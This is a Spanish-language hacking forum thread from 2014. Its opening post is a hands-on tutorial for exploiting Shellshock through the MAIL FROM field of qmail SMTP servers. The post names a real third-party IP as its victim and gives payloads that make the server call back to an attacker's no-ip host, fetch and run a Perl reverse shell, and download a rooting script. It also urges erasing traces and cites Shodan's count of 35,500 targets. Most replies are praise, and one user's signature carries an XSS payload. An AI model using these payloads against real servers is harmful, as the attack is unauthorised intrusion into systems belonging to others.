comment
IRC Chat
play_arrow
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.

Explotar Shellshock en smtp QMAIL

  • 9 Respuestas
  • 5669 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« en: Octubre 02, 2014, 12:40:27 am »
ShellShock Exploit PoC

Bueno antes que nada le agradezco a hielasangre por sacarme el bloqueo :P

Como he leido mucho de shellshock y nada sobre como explotarlo, les dejo un pequeño tutorial de como explotarlo un poco más allá que en los clasicos user-agent (que siendo realista muy pocos servidores utlizán cgi-scripts y menos hechos en bash)

Esto afecta a los servidores smtp de QMAIL por no validar correctamente el encabezado FROM MAIL:<> permitiendo ingresar como email cualquier string,
nosotros aprovecharemos esto para lograr ejecutar nuestro codigo arbitrario con la ayuda de shellshock

Para el PoC use este servidor que encontre vulnerable: 200.80.35.42

Empezamos!

1) Dejamos a la escucha el puerto donde queremos recibir la conexión entrante:

nc -vv -l -p 9669



2) Nos conectamos al servidor smtp y realizamos el ataque

nc -vv 200.80.35.42 25

Entablamos toda la negociación necesaria con el servidor SMTP, esto consta de 4 pasos

.helo me (Le comunicamos al servidor que necesitamos usar su servicio)
.mail from:<direccion@gmail.com> (establecemos la dirección de email remitente) ---> ACÁ INYECTAMOS NUESTRO CODIGO SHELLSHOCK
rcpt to: <> (direccion@dominio.com) (establecemos la direccion del receptor del mensaje)
data (Comenzamos a escribir el email)
Subject: Titulo. (Establecemos el titulo del mensaje y lo terminamos con un .)
Mensaje. (Escribimos el mensaje terminado con un .)

FIN (Esperamos que se complete el proceso)

(Para mas info de SMTP visitar http://technet.microsoft.com/es-es/library/aa996114(v=exchg.65).aspx )

Bueno como mas arriba dije el error radica en que QMAIL no valida que lo ingresado en MAIL FROM sea un email
entonces en mi caso inyecto el siguiente payload shellshock:

() { :;}; /usr/bin/telnet xxxx.no-ip.org 9669

Al terminar el proceso de QMAIL deberia ejecutar el codigo arbitrario inyectado en la variable global de la función de shellshock y devolvernos una conexion entrante a nuestro puerto a la escucha



Esto significa q con un poco de conocimiento hemos logrado ejecutar codigo arbitrario en el servidor mediante un servidor vulnerable explotando un error de validación de SMTP, en este simple PoC me devolví una conexión telnet, pero podriamos jugar con los comandos para subir un reverse shell y ganar acceso al sistema, veamos como!

Esta vez vamos a ejecutar codigo arbitrario para descargarnos de nuestro servidor web un reverse shell en perl

Payload:

() { :;}; /usr/bin/wget xxx.no-ip.org:8080/rsh.perl



esperamos un tiempo considerable para asegurarnos la descarga de nuestro script, ponemos a escuchar nuevamente nc



y ejecutamos nuestro archivo perl

() { :;}; /usr/bin/perl rsh.perl xxx.no-ip.org 9669 -l



y ahora tenemos acceso al sistema! JA! si indagamos un poco y largamos un whoami! vemos que es un kernel 2.6



Intentemos rootearlo, yo en mi caso use un AutoRoot en perl que encontre por internet.

wget xxx.no-ip.com:8081/AutoRoot.pl



Pasemos a ver si tenemos suerte!

Ejecutamos los AutoRoot.pl y vemos q sucede (yo en mi caso moví ambos archivos a otra carpeta)

perl AutoRoot.pl y esperamos!

En este caso no hemos tenido suerte, lo que no descarta que buscando un poco podamos hacer un rooteo manual del servidor :P (De hecho ya lo hice)
pero eso quedara para otro tutorial! (Estoy haciendo el tutorial mientras realizo la intrusión)



No nos olvidemos de borrar todas nuestras huellas!

Y despues de esto preguntaran, cuantos sitios vulnerables a shellshock existen, bueno yo me ayude un poco de mi amigo SHODAN



35500 posibles target vulnerables solo por QMAIL SMTP!!! Saludos

Happy Haking[/color]
« Última modificación: Octubre 02, 2014, 01:00:34 am por hdbreaker »

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #1 en: Octubre 02, 2014, 01:24:35 am »
Parece que borraron el botón de responder...

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Conectado hielasangre

  • *
  • Underc0der
  • Mensajes: 147
  • Actividad:
    30%
  • Reputación 3
    • Ver Perfil
« Respuesta #2 en: Octubre 02, 2014, 01:44:02 am »
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #3 en: Octubre 02, 2014, 01:46:14 am »
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Gracias a vos loquin! vos me hiciste ver por encima de la pared!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Jimeno

  • *
  • Underc0der
  • Mensajes: 367
  • Actividad:
    0%
  • Reputación -1
  • NULL
    • Ver Perfil
    • Twitter
  • Skype: migueljimeno96
  • Twitter: &quot;&gt;&lt;&lt;img src=y onerror=prompt();&gt;
« Respuesta #4 en: Octubre 02, 2014, 05:12:14 am »
Gran tutorial, hdbreaker, te puse +1, me ha encantado
Contacto: @migueljimeno96 -

Desconectado hdbreaker

  • *
  • Underc0der
  • Mensajes: 411
  • Actividad:
    0%
  • Reputación 0
  • HD_Breaker
    • Ver Perfil
    • Security Signal
    • Email
  • Skype: hdbreaker96
  • Twitter: @SecSignal
« Respuesta #5 en: Octubre 02, 2014, 05:40:38 am »
Gran tutorial, hdbreaker, te puse +1, me ha encantado

jajja gracias!

Ser Libres es un Privilegio por el cual pocos estamos dispuestos a correr el riesgo

Desconectado Snifer

  • *
  • Underc0der
  • Mensajes: 1439
  • Actividad:
    0%
  • Reputación 1
  • Snifer@L4b's
    • Ver Perfil
    • Snifer@L4bs
  • Twitter: sniferl4bs
« Respuesta #6 en: Octubre 02, 2014, 08:06:15 am »
Muy buen aporte! Excelente PoC de una vulnerabilidad muy jodida! Ojala mas usuarios le dieran la importancia que tiene, pero bueh. Genial el post  ;D

Gracias a vos loquin! vos me hiciste ver por encima de la pared!

Que cariño y respeto por no decir amor :D ..

Ya enserio lo vi anoche la entrada pero por vago no comente, ni hice mi prueba xD pero tras hacerla :| me quede asi con la careta, excelente aporte hd igual para ti hiela.

Regards,
Snifer
http://www.sniferl4bs.com


Llaman traidor a la persona que evito que caiga el foro, gente bruta!



Desconectado blackdrake

  • *
  • Co Admin
  • Mensajes: 1914
  • Actividad:
    0%
  • Reputación 15
    • Ver Perfil
« Respuesta #7 en: Octubre 02, 2014, 08:24:10 am »
Excelente aporte, la verdad es que no pensaba que podría ser tan fácil conseguir acceso de esa manera.

Un saludo.



Desconectado q3rv0

  • *
  • Underc0der
  • Mensajes: 207
  • Actividad:
    0%
  • Reputación 1
  • %ERRORLEVEL%
    • Ver Perfil
    • q3rv0
    • Email
« Respuesta #8 en: Octubre 02, 2014, 11:17:50 am »
Terrible post brother! con dhcp tmb se puede explotar http://www.hackplayers.com/2014/09/shellshock-dhcp-o-como-puede.html saludos!

Desconectado WhiZ

  • *
  • Underc0der
  • Mensajes: 395
  • Actividad:
    0%
  • Reputación 0
    • Ver Perfil
« Respuesta #9 en: Octubre 02, 2014, 01:03:27 pm »
No, te fuiste al carajo. Haces q mis post no sean más q ridiculeces 

Muchas gracias por compartir!

Saludos!
WhiZ


 

¿Te gustó el post? COMPARTILO!



Routerpwn, un framework para explotar dispositivos embebidos desde tu celular

Iniciado por hkm

Respuestas: 2
Vistas: 2107
Último mensaje Agosto 01, 2011, 11:45:43 pm
por JaAViEr
Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdoorizar

Iniciado por hdbreaker

Respuestas: 1
Vistas: 2500
Último mensaje Julio 17, 2012, 12:35:31 am
por hdbreaker
Cómo explotar vulnerabilidad de Windows 7 con Metasploit

Iniciado por Pekador

Respuestas: 2
Vistas: 4517
Último mensaje Abril 16, 2012, 04:35:47 pm
por SPELINAX
Metasploit [Explotar Vulnerailidad LNK]

Iniciado por Payasako

Respuestas: 0
Vistas: 1821
Último mensaje Febrero 17, 2015, 06:07:57 pm
por Payasako
Mini Tuto Explotar XSS

Iniciado por ANTRAX

Respuestas: 4
Vistas: 3923
Último mensaje Octubre 08, 2012, 01:29:18 am
por zoro248